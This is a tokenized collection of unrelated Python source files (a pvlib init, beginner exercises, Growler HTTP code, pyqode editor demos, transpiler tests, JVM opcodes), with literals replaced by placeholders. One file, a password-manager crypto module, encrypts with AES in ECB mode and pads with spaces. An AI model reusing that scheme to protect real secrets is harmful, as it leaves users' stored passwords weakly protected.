<NUM_LIT:2> : <EOL> ask = input <EOL> else : <EOL> ask = raw_input <EOL> answer = ask ( '<STR_LIT>' % path ) <EOL> return True if answer . strip ( ) . lower ( ) [ : <NUM_LIT:1> ] == '<STR_LIT:y>' else False <EOL> def _spin ( every , state = [ '<STR_LIT:|>' , <NUM_LIT:0> ] ) : <EOL> if state [ <NUM_LIT:1> ] >= every : <EOL> state [ <NUM_LIT:1> ] = <NUM_LIT:0> <EOL> if state [ <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> sigils = '<STR_LIT>' <EOL> state [ <NUM_LIT:0> ] = sigils [ ( sigils . index ( state [ <NUM_LIT:0> ] ) + <NUM_LIT:1> ) % <NUM_LIT:4> ] <EOL> sys . stderr . write ( '<STR_LIT:\r>' + state [ <NUM_LIT:0> ] ) <EOL> sys . stderr . flush ( ) <EOL> state [ <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> def main ( ) : <EOL> copy_indexes ( download_cinspect_data_archive ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> class PusherError ( Exception ) : <EOL> pass <EOL> class PusherBadRequest ( PusherError ) : <EOL> pass <EOL> class PusherBadAuth ( PusherError ) : <EOL> pass <EOL> class PusherForbidden ( PusherError ) : <EOL> pass <EOL> class PusherBadStatus ( PusherError ) : <EOL> pass </s>
<s> import logging <EOL> logging . basicConfig ( ) <EOL> from pvlib . version import __version__ <EOL> from pvlib import tools <EOL> from pvlib import atmosphere <EOL> from pvlib import clearsky <EOL> from pvlib import irradiance <EOL> from pvlib import location <EOL> from pvlib import solarposition <EOL> from pvlib import tmy <EOL> from pvlib import tracking <EOL> from pvlib import pvsystem <EOL> from pvlib import spa <EOL> from pvlib import modelchain </s>
<s> cars = <NUM_LIT:100> <EOL> space_in_a_car = <NUM_LIT> <EOL> drivers = <NUM_LIT:30> <EOL> passengers = <NUM_LIT> <EOL> cars_not_driven = cars - drivers <EOL> cars_driven = drivers <EOL> carpool_capacity = cars_driven * space_in_a_car <EOL> average_passengers_per_car = passengers / cars_driven <EOL> print "<STR_LIT>" , cars , "<STR_LIT>" <EOL> print "<STR_LIT>" , drivers , "<STR_LIT>" <EOL> print "<STR_LIT>" , cars_not_driven , "<STR_LIT>" <EOL> print "<STR_LIT>" , carpool_capacity , "<STR_LIT>" <EOL> print "<STR_LIT>" , passengers , "<STR_LIT>" <EOL> print "<STR_LIT>" , average_passengers_per_car , "<STR_LIT>" </s>
<s> print "<STR_LIT>" <EOL> door = raw_input ( "<STR_LIT>" ) <EOL> if door == "<STR_LIT:1>" : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> bear = raw_input ( "<STR_LIT>" ) <EOL> if bear == "<STR_LIT:1>" : <EOL> print "<STR_LIT>" <EOL> elif bear == "<STR_LIT:2>" : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" % bear <EOL> elif door == "<STR_LIT:2>" : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> insanity = raw_input ( "<STR_LIT>" ) <EOL> if insanity == "<STR_LIT:1>" or insanity == "<STR_LIT:2>" : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" </s>
<s> from nose . tools import * <EOL> from exercise48 . parser import * <EOL> def test_parse_sentence ( ) : <EOL> sentence = parse_sentence ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> assert_equal ( sentence . subject , '<STR_LIT>' ) <EOL> assert_equal ( sentence . verb , '<STR_LIT>' ) <EOL> assert_equal ( sentence . object , '<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import base64 <EOL> import ctypes <EOL> import string <EOL> import os <EOL> import sys <EOL> import binascii <EOL> import time <EOL> import random <EOL> from Crypto . Cipher import AES <EOL> from Crypto . Protocol . KDF import PBKDF2 <EOL> from pwman . util . callback import Callback <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> raw_input = input <EOL> EncodeAES = lambda c , s : base64 . b64encode ( c . encrypt ( s ) ) <EOL> DecodeAES = lambda c , e : c . decrypt ( base64 . b64decode ( e ) ) . rstrip ( ) <EOL> def generate_password ( pass_len = <NUM_LIT:8> , uppercase = True , lowercase = True , digits = True , <EOL> special_chars = True ) : <EOL> allowed = '<STR_LIT>' <EOL> if lowercase : <EOL> allowed = allowed + string . ascii_lowercase <EOL> if uppercase : <EOL> allowed = allowed + string . ascii_uppercase <EOL> if digits : <EOL> allowed = allowed + string . digits <EOL> if special_chars : <EOL> allowed = allowed + string . punctuation <EOL> password = '<STR_LIT>' . join ( random . SystemRandom ( ) . choice ( allowed ) <EOL> for _ in range ( pass_len ) ) <EOL> return password <EOL> def zerome ( string ) : <EOL> """<STR_LIT>""" <EOL> bufsize = len ( string ) + <NUM_LIT:1> <EOL> offset = sys . getsizeof ( string ) - bufsize <EOL> ctypes . memset ( id ( string ) + offset , <NUM_LIT:0> , bufsize ) <EOL> class CryptoException ( Exception ) : <EOL> pass <EOL> def get_digest ( password , salt ) : <EOL> """<STR_LIT>""" <EOL> iterations = <NUM_LIT> <EOL> if isinstance ( password , bytes ) : <EOL> password = password . decode ( ) <EOL> return PBKDF2 ( password , salt , dkLen = <NUM_LIT:32> , count = iterations ) <EOL> def get_cipher ( password , salt ) : <EOL> """<STR_LIT>""" <EOL> iv = os . urandom ( AES . block_size ) <EOL> dig = get_digest ( password , salt ) <EOL> chiper = AES . new ( dig , AES . MODE_ECB , iv ) <EOL> return chiper <EOL> def prepare_data ( text , block_size ) : <EOL> """<STR_LIT>""" <EOL> num_blocks = len ( text ) // block_size + <NUM_LIT:1> <EOL> newdatasize = block_size * num_blocks <EOL> return text . ljust ( newdatasize ) <EOL> class CryptoEngine ( object ) : <EOL> _timeoutcount = <NUM_LIT:0> <EOL> _instance = None <EOL> _callback = None <EOL> @ classmethod <EOL> def get ( cls , timeout = - <NUM_LIT:1> ) : <EOL> if CryptoEngine . _instance : <EOL> return CryptoEngine . _instance <EOL> CryptoEngine . _instance = CryptoEngine ( timeout ) <EOL> return CryptoEngine . _instance <EOL> def __init__ ( self , salt = None , digest = None , algorithm = '<STR_LIT>' , <EOL> timeout = - <NUM_LIT:1> , reader = None ) : <EOL> """<STR_LIT>""" <EOL> self . _algo = algorithm <EOL> self . _digest = digest if digest else None <EOL> self . _salt = salt if salt else None <EOL> self . _timeout = timeout <EOL> self . _cipher = None <EOL> self . _reader = reader <EOL> self . _callback = None <EOL> self . _getsecret = None <EOL> def authenticate ( self , password ) : <EOL> """<STR_LIT>""" <EOL> dig = get_digest ( password , self . _salt ) <EOL> if binascii . hexlify ( dig ) == self . _digest or dig == self . _digest : <EOL> CryptoEngine . _timeoutcount = time . time ( ) <EOL> self . _cipher = get_cipher ( password , self . _salt ) <EOL> return True <EOL> return False <EOL> def _auth ( self ) : <EOL> """<STR_LIT>""" <EOL> salt = self . _salt <EOL> tries = <NUM_LIT:0> <EOL> while tries < <NUM_LIT:5> : <EOL> password = self . _getsecret ( "<STR_LIT>" <EOL> ) . encode ( '<STR_LIT:utf-8>' ) <EOL> if self . authenticate ( password ) : <EOL> return password , salt <EOL> print ( "<STR_LIT>" ) <EOL> tries += <NUM_LIT:1> <EOL> raise CryptoException ( "<STR_LIT>" ) <EOL> def encrypt ( self , text ) : <EOL> if not self . _is_authenticated ( ) : <EOL> p , s = self . _auth ( ) <EOL> cipher = get_cipher ( p , s ) <EOL> self . _cipher = cipher <EOL> del ( p ) <EOL> return EncodeAES ( self . _cipher , prepare_data ( text , AES . block_size ) ) <EOL> def decrypt ( self , cipher_text ) : <EOL> if not self . _is_authenticated ( ) : <EOL> p , s = self . _auth ( ) <EOL> cipher = get_cipher ( p , s ) <EOL> self . _cipher = cipher <EOL> del ( p ) <EOL> return DecodeAES ( self . _cipher , prepare_data ( cipher_text , <EOL> AES . block_size ) ) <EOL> def forget ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _cipher = None <EOL> def _is_authenticated ( self ) : <EOL> if not self . _digest and not self . _salt : <EOL> self . _create_password ( ) <EOL> if not self . _is_timedout ( ) and self . _cipher is not None : <EOL> return True <EOL> return False <EOL> def _is_timedout ( self ) : <EOL> if self . _timeout > <NUM_LIT:0> : <EOL> if ( time . time ( ) - CryptoEngine . _timeoutcount ) > self . _timeout : <EOL> self . _cipher = None <EOL> return True <EOL> return False <EOL> def changepassword ( self , reader = raw_input ) : <EOL> if self . _callback is None : <EOL> raise CryptoException ( "<STR_LIT>" ) <EOL> self . _keycrypted = self . _create_password ( ) <EOL> self . set_cryptedkey ( self . _keycrypted ) <EOL> return self . _keycrypted <EOL> @ property <EOL> def callback ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _callback <EOL> @ callback . setter <EOL> def callback ( self , callback ) : <EOL> if isinstance ( callback , Callback ) : <EOL> self . _callback = callback <EOL> self . _getsecret = callback . getsecret <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def _create_password ( self ) : <EOL> """<STR_LIT>""" <EOL> salt = base64 . b64encode ( os . urandom ( <NUM_LIT:32> ) ) <EOL> passwd = self . _getsecret ( "<STR_LIT>" ) <EOL> key = get_digest ( passwd , salt ) <EOL> hpk = salt + '<STR_LIT>' . encode ( '<STR_LIT:utf8>' ) + binascii . hexlify ( key ) <EOL> self . _digest = key <EOL> self . _salt = salt <EOL> self . _cipher = get_cipher ( passwd , salt ) <EOL> return hpk . decode ( '<STR_LIT:utf-8>' ) <EOL> def set_cryptedkey ( self , key ) : <EOL> salt , digest = key . split ( '<STR_LIT>' ) <EOL> self . _digest = digest . encode ( '<STR_LIT:utf-8>' ) <EOL> self . _salt = salt . encode ( '<STR_LIT:utf-8>' ) <EOL> def get_cryptedkey ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _salt . decode ( ) + u'<STR_LIT>' + self . _digest . decode ( ) </s>
<s> """<STR_LIT>""" <EOL> from . parser import Parser <EOL> from . request import HTTPRequest <EOL> from . response import HTTPResponse <EOL> from . protocol import GrowlerHTTPProtocol <EOL> from . errors import __all__ as http_errors <EOL> from . status import Status <EOL> from . methods import HTTPMethod <EOL> from http . server import BaseHTTPRequestHandler <EOL> import mimetypes <EOL> mimetypes . init ( ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> __all__ . extend ( http_errors ) <EOL> MAX_REQUEST_LENGTH = <NUM_LIT:4> * ( <NUM_LIT:2> ** <NUM_LIT:10> ) <EOL> MAX_POST_LENGTH = <NUM_LIT:2> * ( <NUM_LIT:2> ** <NUM_LIT:20> ) <EOL> RESPONSES = BaseHTTPRequestHandler . responses <EOL> HttpStatusPhrase = Status . Phrase </s>
<s> import sys <EOL> import pytest <EOL> from unittest import mock <EOL> @ pytest . fixture <EOL> def mock_importer ( ) : <EOL> import growler . ext <EOL> return mock . create_autospec ( growler . ext ) <EOL> def test_module ( ) : <EOL> import growler . ext <EOL> assert growler . ext . __name__ == '<STR_LIT>' <EOL> def test_load_module ( ) : <EOL> mod = mock . Mock ( ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> from growler . ext import xxxx <EOL> assert xxxx is mod <EOL> def test_load_module_cached ( ) : <EOL> import growler . ext <EOL> mod = mock . Mock ( ) <EOL> growler . ext . __mods__ = mock . MagicMock ( ) <EOL> growler . ext . __mods__ . __contains__ . return_value = True <EOL> growler . ext . mod_is_cached <EOL> assert growler . ext . __mods__ . __getitem__ . called <EOL> growler . ext . __mods__ . __contains__ . assert_called_with ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> import sys <EOL> from pyqode . qt import QtWidgets <EOL> from pyqode . core . api import CodeEdit <EOL> from pyqode . core . backend import server <EOL> from pyqode . core . modes import CaseConverterMode <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app = QtWidgets . QApplication ( sys . argv ) <EOL> editor = CodeEdit ( ) <EOL> editor . backend . start ( server . __file__ ) <EOL> editor . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> print ( editor . modes . append ( CaseConverterMode ( ) ) ) <EOL> editor . show ( ) <EOL> editor . setPlainText ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> editor . selectAll ( ) <EOL> app . exec_ ( ) <EOL> editor . close ( ) <EOL> del editor <EOL> del app </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> import sys <EOL> from pyqode . qt import QtWidgets <EOL> from pyqode . core . api import CodeEdit <EOL> from pyqode . core . backend import server <EOL> from pyqode . core . panels import SearchAndReplacePanel <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app = QtWidgets . QApplication ( sys . argv ) <EOL> editor = CodeEdit ( ) <EOL> editor . backend . start ( server . __file__ ) <EOL> editor . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> editor . panels . append ( SearchAndReplacePanel ( ) , <EOL> SearchAndReplacePanel . Position . TOP ) <EOL> editor . setPlainText ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> editor . show ( ) <EOL> app . exec_ ( ) <EOL> editor . close ( ) <EOL> del editor <EOL> del app </s>
<s> """<STR_LIT>""" <EOL> from . code_edit import CodeEdit <EOL> from . decoration import TextDecoration <EOL> from . encodings import ENCODINGS_MAP , convert_to_codec_key <EOL> from . manager import Manager <EOL> from . mode import Mode <EOL> from . panel import Panel <EOL> from . syntax_highlighter import ColorScheme <EOL> from . syntax_highlighter import PYGMENTS_STYLES <EOL> from . syntax_highlighter import SyntaxHighlighter <EOL> from . syntax_highlighter import TextBlockUserData <EOL> from . utils import TextHelper , TextBlockHelper <EOL> from . utils import get_block_symbol_data <EOL> from . utils import DelayJobRunner <EOL> from . folding import FoldDetector <EOL> from . folding import IndentFoldDetector <EOL> from . folding import CharBasedFoldDetector <EOL> from . folding import FoldScope <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from pyqode . qt import QtCore , QtGui <EOL> from pyqode . core . api import TextHelper <EOL> from pyqode . core . api . mode import Mode <EOL> class AutoCompleteMode ( Mode ) : <EOL> """<STR_LIT>""" <EOL> MAPPING = { '<STR_LIT:">' : '<STR_LIT:">' , "<STR_LIT:'>" : "<STR_LIT:'>" , "<STR_LIT:(>" : "<STR_LIT:)>" , "<STR_LIT:{>" : "<STR_LIT:}>" , "<STR_LIT:[>" : "<STR_LIT:]>" } <EOL> SELECTED_QUOTES_FORMATS = { key : '<STR_LIT>' for key in MAPPING . keys ( ) } <EOL> QUOTES_FORMATS = { key : '<STR_LIT:%s>' for key in MAPPING . keys ( ) } <EOL> def __init__ ( self ) : <EOL> super ( AutoCompleteMode , self ) . __init__ ( ) <EOL> self . logger = logging . getLogger ( __name__ ) <EOL> self . _ignore_post = False <EOL> def on_state_changed ( self , state ) : <EOL> if state : <EOL> self . editor . post_key_pressed . connect ( self . _on_post_key_pressed ) <EOL> self . editor . key_pressed . connect ( self . _on_key_pressed ) <EOL> else : <EOL> self . editor . post_key_pressed . disconnect ( self . _on_post_key_pressed ) <EOL> self . editor . key_pressed . disconnect ( self . _on_key_pressed ) <EOL> def _on_post_key_pressed ( self , event ) : <EOL> if not event . isAccepted ( ) and not self . _ignore_post : <EOL> txt = event . text ( ) <EOL> trav = self . editor . textCursor ( ) <EOL> assert isinstance ( trav , QtGui . QTextCursor ) <EOL> trav . movePosition ( trav . Left , trav . MoveAnchor , <NUM_LIT:2> ) <EOL> literal = TextHelper ( self . editor ) . is_comment_or_string ( trav ) <EOL> if not literal : <EOL> next_char = TextHelper ( self . editor ) . get_right_character ( ) <EOL> if txt in self . MAPPING : <EOL> to_insert = self . MAPPING [ txt ] <EOL> if ( not next_char or next_char in self . MAPPING . keys ( ) or <EOL> next_char in self . MAPPING . values ( ) or <EOL> next_char . isspace ( ) ) : <EOL> TextHelper ( self . editor ) . insert_text ( <EOL> self . QUOTES_FORMATS [ txt ] % to_insert ) <EOL> self . _ignore_post = False <EOL> def _on_key_pressed ( self , event ) : <EOL> txt = event . text ( ) <EOL> cursor = self . editor . textCursor ( ) <EOL> from pyqode . qt import QtGui <EOL> assert isinstance ( cursor , QtGui . QTextCursor ) <EOL> if cursor . hasSelection ( ) : <EOL> if event . text ( ) in self . MAPPING . keys ( ) : <EOL> first = event . text ( ) <EOL> last = self . MAPPING [ event . text ( ) ] <EOL> cursor . insertText ( <EOL> self . SELECTED_QUOTES_FORMATS [ event . text ( ) ] % ( <EOL> first , cursor . selectedText ( ) , last ) ) <EOL> self . editor . setTextCursor ( cursor ) <EOL> event . accept ( ) <EOL> else : <EOL> self . _ignore_post = True <EOL> return <EOL> next_char = TextHelper ( self . editor ) . get_right_character ( ) <EOL> self . logger . debug ( '<STR_LIT>' , next_char ) <EOL> ignore = False <EOL> if event . key ( ) == QtCore . Qt . Key_Backspace : <EOL> tc = self . editor . textCursor ( ) <EOL> pos = tc . position ( ) <EOL> tc . movePosition ( tc . Left ) <EOL> tc . movePosition ( tc . Right , tc . KeepAnchor ) <EOL> del_char = tc . selectedText ( ) <EOL> if del_char in self . MAPPING and self . MAPPING [ del_char ] == next_char : <EOL> tc . beginEditBlock ( ) <EOL> tc . movePosition ( tc . Right , tc . KeepAnchor ) <EOL> tc . insertText ( '<STR_LIT>' ) <EOL> tc . setPosition ( pos - <NUM_LIT:2> ) <EOL> tc . endEditBlock ( ) <EOL> self . editor . setTextCursor ( tc ) <EOL> ignore = True <EOL> elif txt and next_char == txt and next_char in self . MAPPING : <EOL> ignore = True <EOL> elif event . text ( ) == '<STR_LIT:)>' or event . text ( ) == '<STR_LIT:]>' or event . text ( ) == '<STR_LIT:}>' : <EOL> if next_char == event . text ( ) : <EOL> ignore = True <EOL> if ignore : <EOL> event . accept ( ) <EOL> TextHelper ( self . editor ) . clear_selection ( ) <EOL> TextHelper ( self . editor ) . move_right ( ) </s>
<s> """<STR_LIT>""" <EOL> from . qt import QtStyle <EOL> from . darcula import DarculaStyle <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] </s>
<s> """<STR_LIT>""" </s>
<s> import os <EOL> from pyqode . core . api import TextHelper <EOL> from pyqode . qt import QtCore , QtGui <EOL> from pyqode . qt . QtTest import QTest <EOL> from pyqode . core import modes <EOL> def get_mode ( editor ) : <EOL> return editor . modes . get ( modes . WordClickMode ) <EOL> def test_enabled ( editor ) : <EOL> mode = get_mode ( editor ) <EOL> assert mode . enabled <EOL> mode . enabled = False <EOL> mode . enabled = True <EOL> def test_events ( editor ) : <EOL> mode = get_mode ( editor ) <EOL> mode . _add_decoration ( editor . textCursor ( ) ) <EOL> pt = QtCore . QPoint ( <NUM_LIT:10> , TextHelper ( editor ) . line_pos_from_number ( <NUM_LIT:0> ) ) <EOL> if os . environ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> QTest . mouseMove ( editor , pt ) <EOL> QTest . mousePress ( editor , QtCore . Qt . LeftButton , <EOL> QtCore . Qt . ControlModifier , pt ) <EOL> QTest . mouseMove ( editor , pt ) <EOL> else : <EOL> editor . mouseMoveEvent ( QtGui . QMouseEvent ( <EOL> QtCore . QEvent . MouseMove , pt , <EOL> QtCore . Qt . RightButton , QtCore . Qt . RightButton , <EOL> QtCore . Qt . ControlModifier ) ) <EOL> editor . mousePressEvent ( QtGui . QMouseEvent ( <EOL> QtCore . QEvent . MouseButtonPress , pt , <EOL> QtCore . Qt . LeftButton , QtCore . Qt . RightButton , QtCore . Qt . NoModifier ) ) <EOL> editor . mouseMoveEvent ( QtGui . QMouseEvent ( <EOL> QtCore . QEvent . MouseMove , pt , <EOL> QtCore . Qt . RightButton , QtCore . Qt . RightButton , <EOL> QtCore . Qt . NoModifier ) ) </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class CallableTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinCallableFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class IssubclassTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinIssubclassFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class SuperTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinSuperFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase <EOL> import unittest <EOL> class ListComprehensionTests ( TranspileTestCase ) : <EOL> def test_syntax ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" ) <EOL> @ unittest . expectedFailure <EOL> def test_method ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" ) </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:1> , os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) ) <EOL> import bugjar <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT:.>' . join ( str ( n ) for n in bugjar . NUM_VERSION [ : <NUM_LIT:2> ] ) <EOL> release = bugjar . VERSION <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import sys <EOL> from setuptools import setup <EOL> from duvet import VERSION <EOL> try : <EOL> readme = open ( '<STR_LIT>' ) <EOL> long_description = str ( readme . read ( ) ) <EOL> finally : <EOL> readme . close ( ) <EOL> required_pkgs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> required_pkgs . append ( '<STR_LIT>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = VERSION , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = required_pkgs , <EOL> scripts = [ ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> } , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class LenTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinLenFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase <EOL> class ClassTests ( TranspileTestCase ) : <EOL> def test_minimal ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" , run_in_function = False ) <EOL> def test_simple ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" , run_in_function = False ) <EOL> def test_method_override ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" , run_in_function = False ) <EOL> def test_subclass ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" ) </s>
<s> from . constants import Classref , Fieldref , Methodref , InterfaceMethodref , String , Integer , Long , Float , Double , Constant <EOL> class Opcode : <EOL> opcodes = None <EOL> def __init__ ( self ) : <EOL> self . references = [ ] <EOL> self . starts_line = None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . __arg_repr__ ( ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ classmethod <EOL> def read ( cls , reader , dump = None ) : <EOL> code = reader . read_u1 ( ) <EOL> if Opcode . opcodes is None : <EOL> Opcode . opcodes = { } <EOL> for name in globals ( ) : <EOL> klass = globals ( ) [ name ] <EOL> try : <EOL> if name != '<STR_LIT>' and issubclass ( klass , Opcode ) : <EOL> Opcode . opcodes [ klass . code ] = klass <EOL> except TypeError : <EOL> pass <EOL> instance = Opcode . opcodes [ code ] . read_extra ( reader , dump ) <EOL> if dump : <EOL> reader . debug ( "<STR_LIT:U+0020>" * dump , '<STR_LIT>' % ( reader . offset , instance ) ) <EOL> return instance <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> return cls ( ) <EOL> def write ( self , writer ) : <EOL> writer . write_u1 ( self . code ) <EOL> self . write_extra ( writer ) <EOL> def write_extra ( self , writer ) : <EOL> pass <EOL> def resolve ( self , constant_pool ) : <EOL> pass <EOL> @ property <EOL> def stack_effect ( self ) : <EOL> return self . produce_count - self . consume_count <EOL> def process ( self , context ) : <EOL> return True <EOL> class AALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( AALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class AASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( AASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ACONST_NULL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ACONST_NULL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ALOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : 